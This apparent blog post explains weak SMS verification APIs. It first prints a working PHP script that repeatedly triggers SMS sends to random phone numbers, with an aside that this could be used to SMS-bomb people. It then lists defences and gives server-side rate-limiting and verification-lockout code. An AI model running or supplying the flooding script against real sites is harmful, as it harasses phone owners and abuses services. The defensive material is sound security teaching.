The SMS-sending interfaces of many small websites are still fairly weak: there is no graphical CAPTCHA, the SMS verification code is short, and so they are easily attacked by a script that calls the interface repeatedly to trigger SMS sends and then brute-forces the verification code. An earlier lottery interface was hit over a hundred million times by anonymous parties. A script that hammers an SMS interface is trivial to put together:
<?php
$url = "http://XXXXXXXXXXXXXXXXXXXX"; // API endpoint that triggers an SMS send

for ($i = 0; $i < 4; $i++) {
    // random number with a fixed prefix, posted as the "mobile" field
    $mobile = "1371" . mt_rand(0000000, 9999999);
    $post = array("mobile" => $mobile);
    $res = query($url, array(), $post);
    $res = json_decode($res, true);
    // convert the JSON "message" field for a GB2312 console
    $msg = iconv('UTF-8', 'GB2312', $res["message"]);
    echo $mobile;
    echo "\n\t";
    echo $msg;
}

// Minimal cURL wrapper: GET parameters are appended to the URL,
// POST parameters are form-encoded into the body.
function query($url, $get = array(), $post = array())
{
    $urlPrefix = $url;
    $query = http_build_query($get);
    $url = $urlPrefix . (strpos($urlPrefix, "?") ? "&" : "?") . $query;
    $opt = array(
        CURLOPT_RETURNTRANSFER => TRUE,
        CURLOPT_HEADER         => FALSE,
        CURLOPT_FOLLOWLOCATION => FALSE,
        CURLOPT_ENCODING       => "",
        CURLOPT_AUTOREFERER    => TRUE,
        CURLOPT_CONNECTTIMEOUT => 1,
        CURLOPT_TIMEOUT        => 5,
        CURLOPT_SSL_VERIFYHOST => 0,
        CURLOPT_SSL_VERIFYPEER => FALSE,
        CURLOPT_VERBOSE        => FALSE,
    );
    $ch = curl_init();
    curl_setopt_array($ch, $opt);
    curl_setopt($ch, CURLOPT_URL, $url);
    if ($post) {
        $post = http_build_query($post);
        curl_setopt($ch, CURLOPT_POST, 1);
        curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
    }
    $raw = curl_exec($ch);
    $errno = curl_errno($ch);
    if ($errno == CURLE_COULDNT_CONNECT) {
        echo "connect wrong {$url}";
        die();
    }
    return $raw;
}
I casually tested a lottery site's interface and found it would send SMS messages back to back; I think this could be used to SMS-bomb certain people!
Registration pages normally use an HTTPS connection, require a graphical CAPTCHA before an SMS is sent, and refuse repeated requests from the same number. There are many ways to prevent this kind of abuse, and registration and login flows need particular care in their design.
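The controls listed above, put together as an added example on the server side (this is not code from the original post, and the class, method names and limits are assumptions chosen for illustration): CAPTCHA checked before any send, a per-number cooldown and daily cap, a per-IP sliding window, a code drawn from the CSPRNG that expires, and a verification step that voids the code after a handful of wrong guesses so a 6-digit code cannot be brute-forced.

```php
<?php
// Added example, not code from the original post: a server-side guard for an
// SMS verification-code endpoint. The store is in-memory for the demo; a real
// deployment keeps these counters in Redis or a database shared by all web nodes.

class SmsGuard
{
    const COOLDOWN_SECONDS = 60;   // one send per number per minute
    const PER_NUMBER_DAILY = 5;    // hard cap per number per day
    const PER_IP_PER_HOUR  = 10;   // cap per client IP per hour
    const CODE_TTL_SECONDS = 300;  // code valid for 5 minutes
    const MAX_VERIFY_TRIES = 5;    // wrong guesses before the code is voided

    private $sender;               // callable(mobile, code): hands the code to the SMS gateway
    private $lastSend   = array(); // mobile => unix time of last send
    private $dailyCount = array(); // "mobile:day" => sends that day
    private $ipHits     = array(); // ip => list of send timestamps
    private $codes      = array(); // mobile => array(code, expires, tries)

    public function __construct(callable $sender)
    {
        $this->sender = $sender;
    }

    // Returns a status string; only 'sent' means an SMS actually went out.
    public function requestCode($mobile, $ip, $captchaPassed, $now)
    {
        if (!$captchaPassed) {
            return 'captcha_required';      // CAPTCHA is verified before anything is sent
        }
        if (!preg_match('/^1[3-9][0-9]{9}$/', $mobile)) {
            return 'invalid_mobile';        // mainland China mobile format (assumption)
        }
        // Per-IP sliding window: drop timestamps older than an hour, then count.
        $hits = isset($this->ipHits[$ip]) ? $this->ipHits[$ip] : array();
        $cutoff = $now - 3600;
        $hits = array_values(array_filter($hits, function ($t) use ($cutoff) {
            return $t > $cutoff;
        }));
        if (count($hits) >= self::PER_IP_PER_HOUR) {
            return 'ip_rate_limited';
        }
        // Per-number cooldown and daily cap.
        if (isset($this->lastSend[$mobile])
            && $now - $this->lastSend[$mobile] < self::COOLDOWN_SECONDS) {
            return 'cooldown';
        }
        $dayKey = $mobile . ':' . intdiv($now, 86400);
        $sentToday = isset($this->dailyCount[$dayKey]) ? $this->dailyCount[$dayKey] : 0;
        if ($sentToday >= self::PER_NUMBER_DAILY) {
            return 'daily_cap';
        }
        // 6-digit code from the CSPRNG, stored with expiry and attempt counter.
        $code = str_pad((string) random_int(0, 999999), 6, '0', STR_PAD_LEFT);
        $this->codes[$mobile] = array(
            'code' => $code, 'expires' => $now + self::CODE_TTL_SECONDS, 'tries' => 0,
        );
        $this->lastSend[$mobile]   = $now;
        $this->dailyCount[$dayKey] = $sentToday + 1;
        $hits[] = $now;
        $this->ipHits[$ip] = $hits;
        call_user_func($this->sender, $mobile, $code);
        return 'sent';
    }

    // Bounded, single-use verification: a code survives at most
    // MAX_VERIFY_TRIES guesses, so enumerating 000000..999999 is impossible.
    public function verifyCode($mobile, $guess, $now)
    {
        if (!isset($this->codes[$mobile])) {
            return 'no_code';
        }
        if ($now > $this->codes[$mobile]['expires']) {
            unset($this->codes[$mobile]);
            return 'expired';
        }
        $this->codes[$mobile]['tries']++;
        if (!hash_equals($this->codes[$mobile]['code'], (string) $guess)) {
            if ($this->codes[$mobile]['tries'] >= self::MAX_VERIFY_TRIES) {
                unset($this->codes[$mobile]);   // void the code; a fresh request is needed
                return 'locked';
            }
            return 'wrong';
        }
        unset($this->codes[$mobile]);           // single use
        return 'ok';
    }
}

// Constructed demo: the sender is a stub that prints instead of calling a gateway.
$guard = new SmsGuard(function ($mobile, $code) {
    echo "stub gateway: code $code -> $mobile\n";
});
$t = 1700000000;
echo $guard->requestCode('13712345678', '203.0.113.5', true, $t), "\n";       // first request
echo $guard->requestCode('13712345678', '203.0.113.5', true, $t + 5), "\n";   // retry inside the cooldown
echo $guard->requestCode('13712345678', '203.0.113.5', false, $t + 61), "\n"; // retry without CAPTCHA
for ($i = 0; $i < 5; $i++) {                                                  // five bad guesses void the code
    echo $guard->verifyCode('13712345678', 'xxxxxx', $t + 10), "\n";
}
```

The per-number cooldown is what stops the loop in the script above from triggering one SMS per request, the per-IP window limits how many different numbers one client can target, and the attempt counter on verifyCode is what makes a short code acceptable: with five guesses against a million possibilities, the code length no longer decides the outcome.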